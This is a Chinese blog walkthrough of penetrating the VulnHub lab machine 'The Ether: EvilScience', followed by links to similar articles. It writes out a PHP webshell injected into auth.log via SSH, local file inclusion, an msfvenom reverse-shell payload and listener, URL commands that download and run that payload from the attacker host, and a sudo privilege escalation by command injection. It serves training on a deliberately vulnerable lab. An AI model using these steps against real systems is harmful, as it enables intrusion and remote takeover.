The Ether: Evil Science靶机渗透测试

于 2024-08-09 21:12:09 发布
阅读量98 收藏 1
点赞数 3
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58786230/article/details/141071151
版权

一、靶机下载地址

https://www.vulnhub.com/entry/the-ether-evilscience-v101,212/

二、信息收集

1、主机发现

# 使用命令
nmap 192.168.145.0/24 -sn | grep -B 2 "00:0C:29:F8:90:7A"

2、端口扫描

# 使用命令
nmap 192.168.145.201 -p- -sV

3、指纹识别

# 使用命令
whatweb 192.168.145.201

4、目录扫描

# 使用命令
dirsearch -u  "http://192.168.145.201"

三、获取shell

1、访问靶机IP地址

2、发下在点击上面的ABOUT US之后,url里有着请求参数:/?file=about.php,可能存在文件包含漏洞

3、拼接目录扫描出的目录,没有什么有用的信息,对可能存在文件包含漏洞的页面进行burp抓包,对file参数后面进行文件爆破

# 要爆破的文件
/usr/local/apache2/logs/access_log 
/logs/access_log 
/etc/httpd/logs/access_log 
/var/log/httpd/access_log
/var/log/auth.log

4、发现有一个/var/log/auth.log目录存在重定向,打开响应包,里面是日志记录,并且是ssh的记录,应该是会把ssh操作记录到这里面,我们尝试利用ssh写入一句话木马

5、利用ssh登录产生错误日志写入一句话木马,密码随便填

ssh '<?php @eval($_GET[d1no]);?>'@192.168.254.141

6、访问执行命令

7、获取shell,用msfvenom生成 shell

# 使用命令
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.145.146 LPORT=1234 -f elf > shell.elf

8、开启监听,并设置相关参数

#开启环境
msfconsole
 
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 192.168.145.146
set lport 1234
run

9、在下载的shell.elf文件下面开启web服务,进行远程下载

# 使用命令
python3 -m http.server

10、利用前面的漏洞执行远程下载和运行,将下面的每条命令在网页里拼接在URL参数后面,回车执行就可以,继续下一条命令

# 使用命令
/?file=/var/log/auth.log&d1no=system('wget+192.168.145.146:8000/shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('chmod+%2bx+shell.elf')%3b
/?file=/var/log/auth.log&d1no=system('./shell.elf')%3b

11、命令执行完后成功获取到shell

四、提权

1、先将获取到的shell转变为交互式的shell

# 使用命令
shell
 
python -c 'import pty;pty.spawn("/bin/bash")'

2、输入sudo -l查看可执行的命令

3、执行一下命令,提权成功

# 使用命令
sudo ./xxxlogauditorxxx.py
/var/log/auth.log | whoami

果冻*果冻*
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python渗透测试之ARP毒化和协议应用
Liu_Bruce的博客
04-25 2312
Python渗透测试之ARP毒化和协议应用 1. ARP毒化 ​ ARP毒化是一种比较老的渗透测试技术,通过ARP毒化技术分析并提取内网流量中的敏感信息,往往会有许多意外的收获。 1.1 工作原理 ARP(地址解析协议)是数据链路层的协议, 主要负责根据网络层地址(IP)来获取数据链路层地址(MAC)。以太网协议规定,同一局域网中的一台主机要和另一台主机进行直接通信,必须知道目标主机的MAC地址。而在TCP/IP中,网络只关注目标主机的IP地址,这就导致在以太网中使用IP协议时,数据链路层的以太网协议接收
Kali Linux渗透测试——密码破解
Captain_RB的博客
07-27 1万+
Kali Linux渗透测试——密码破解 笔记内容参考安全牛苑房弘老师的Kali Linux渗透测试教程 当目标系统无任何已知漏洞时,可以考虑社会工程学或者获取目标系统的用户身份,通过合法账户登录可以绕过系统的安全防线。账户登录身份认证包括账号密码、passphrase、密保、手机、指纹、声纹、面部识别等,其中账号密码是安全级别较低的认证方式,基于互联网的身份认证仍以账号密码为主要形式。 密...
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE
LYJ20010728的博客
08-07 1099
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE环境下载THE ETHER: EVILSCIENCE靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 THE ETHER: EVILSCIENCE靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 攻击机IP地址:192.168.246.129 渗透测试 信息搜集 用netdiscover查看一下:sudo netdiscover -r 192.168.246.0
The Ether: EvilScience靶机渗透实战总结
weixin_34220834的博客
08-20 1117
近期朋友给我发了一个靶机,说是他在日志注入的时候遇到了一点小问题,让我帮忙解决一下。下载下来之后,感觉这个靶机还是挺不错的,里边有一些套路,于是整理成一篇文章,感兴趣的小伙伴可以自己尝试一下。 靶机下载https://www.vulnhub.com/entry... 信息收集首先扫描内网,发现目标主机ip arp-scan -l ...
Vulnhub 渗透练习(八)—— THE ETHER: EVILSCIENCE
shinygod的博客
02-19 606
本地文件包含:利用 ssh 登录产生错误日志写入一句话木马(ssh ''@ip)seclists 字典:https://github.com/danielmiessler/SecListssudo -l。
使用Python编写渗透测试工具——学习笔记
渗透测试
06-25 2398
目录0x01.Socket模块0x02.python-nmap模块0x03.Scapy模块a.基本操作b.发送接收函数c.sniff()函数d.简单的任务实现 0x01.Socket模块 安装socket模块 pip install socketssh 重要的函数(socket.py) import socket # -------------------------------------------------------- # s = socket.socket() #初始化tcp类型的
Vulnhub靶机Wakanda渗透测试攻略
10-15 3847
前言 Wakanda是一个新的交易市场网站,很快会上线了。你的目标是通过黑客技术找到“振金”的确切位置。 页首配图 本vulnhub靶机环境由xMagass开发,并托管于Vulnhub,这台靶机上包含了很多很酷的技巧。 百度网盘下载地址: 链接:https://pan.baidu.com/s/1xwr1li8sJ-Yc7h_jOtVOcw 密码:aixl 难度级别:中级。 用virtualbox导...
Python黑帽子--黑客与渗透测试编程之道
热门推荐
giantbranch的专栏
01-30 8万+
为了方便查找,请看目录(手机端就没有目录哦)→→→→→→→→→→→→→→→ 注:本文篇幅较大,请耐心等待(power by 《Python黑帽子:黑客与渗透测试编程之道 》)   欢迎光顾我的新博客:https://www.giantbranch.cn   终于学完了,也敲完代码了,其中有好几个都没成功实践出作者的预期结果,知道我哪里错的,欢迎指点。(有问题的同学可以看看评论,或许有其他...
Python渗透测试——一、数据包的编辑工具——Scapy
钟言的博客
12-09 1万+
本篇为Python渗透测试的第一篇,数据包的编辑工具,Scapy,详细内容包含了:Scapy简介 Scapy中的分层结构Scapy中的常用函数四、在Scapy 中发送和接收数据包五、Scapy 中的抓包函数等等
ether:Monad变形金刚和职业
03-03
在编程世界中,Haskell是一种纯函数...它允许我们以声明式的方式处理复杂的计算和控制流,同时保持代码的清晰性和可测试性。对于需要处理多种计算效应或需要在不同Monad之间切换的项目,Ether是一个非常有价值的工具。
ether:使用ssh的在线商店
05-18
醚 使用ssh的在线商店
offline-ether:广播离线以太坊交易并查看地址信息
05-16
离线以太运行测试: $ ./gradlew test UI测试(首先连接设备) ./gradlew connectedAndroidTest 该应用程序允许用户从气隙计算机上签署交易。 它的工作原理是允许用户使用相机扫描QR码并自动广播交易。 您还可以添加...
ether:Unity软件包,用于可调制并具有各种效果的信号变量
02-21
Ether是专为Unity游戏引擎设计的一个软件包,它专注于提供可调制且具有各种效果的信号变量。在Unity中,信号变量(或事件系统)通常用于实现组件间的通信,允许不同部分的游戏逻辑相互触发和响应特定事件。这个...
ether-converter:以太单位转换器
05-30
以太转换器以太单位转换器演示安装npm install ether-converter入门 const convert = require ( 'ether-converter' )const result = convert ( 1 , 'ether' )console . log ( JSON . stringify ( result , null , 2 ...
《密码编码学与网络安全原理与实践》第九章 第十章 公钥密码学与密钥管理
最新发布
m0_57291352的博客
08-09 594
原则上不能说传统密码优于公钥密码,也不能说公钥密码优于传统密码公钥密码学仅限于用在密钥管理和签名这类应用中与密钥分配中心的会话过程既不比传统密码中的那些过程更简单,也不比之更有效动机:简化密钥分配和管理、实现签名等功能不对称性是公钥最为重要的性质,可以用来保证“真实”性,“不可否认”性非对称密钥:两个密钥:公钥和私钥,用来实现互补运算,即加密和解密,或者生成签名与验证签名;公钥证书:认证机构将用户的姓名和公钥绑定在一起,用户用自己的私钥对数字文件签名后,可以通过证书识别签名者,因为签名者是唯一拥有与证书上对
网络安全入门教程(非常详细)从零基础入门到精通!
2301_77160226的博客
08-05 1036
网络安全领域犹如一座深邃的知识宝库,从零基础入门到精通是一段充满挑战但也充满收获的旅程。这不仅需要您对知识的不懈追求,更需要大量的实践与经验积累。希望本教程能够为您的网络安全学习之路点亮明灯,引领您在这个充满机遇与挑战的领域中稳步前行,最终成为一名优秀的网络安全专家,为构建安全的网络世界贡献自己的力量!
【网络安全】本地文件包含及远程文件包含漏洞详解
goldfish8848的博客
08-05 862
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
《密码编码学与网络安全原理与实践》第四章第六章第七章 对称加密体制
m0_57291352的博客
08-06 913
对称加密包括分组密码和流密码分组密码:信息被分块(block)进行加密和解密,连续的明文元素使用相同的密钥K来加密,密文C=c1c2…=EK(m1)EK(m2)…C =c_1c_2…=E_K(m_1)E_K(m_2)…C=c1​c2​…=EK​(m1​)EK​(m2​)…。分组密码可以看作是一个字符长度很大代换——如64比特或更多。大部分的分组对称密码都基于Feistel结构。可逆变换是必要条件。设计”安全”的密码算法不难,只要使用足够多的轮数就可以,但降低速度,因此所有问题就是平衡问题。流密码:流密码中按
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值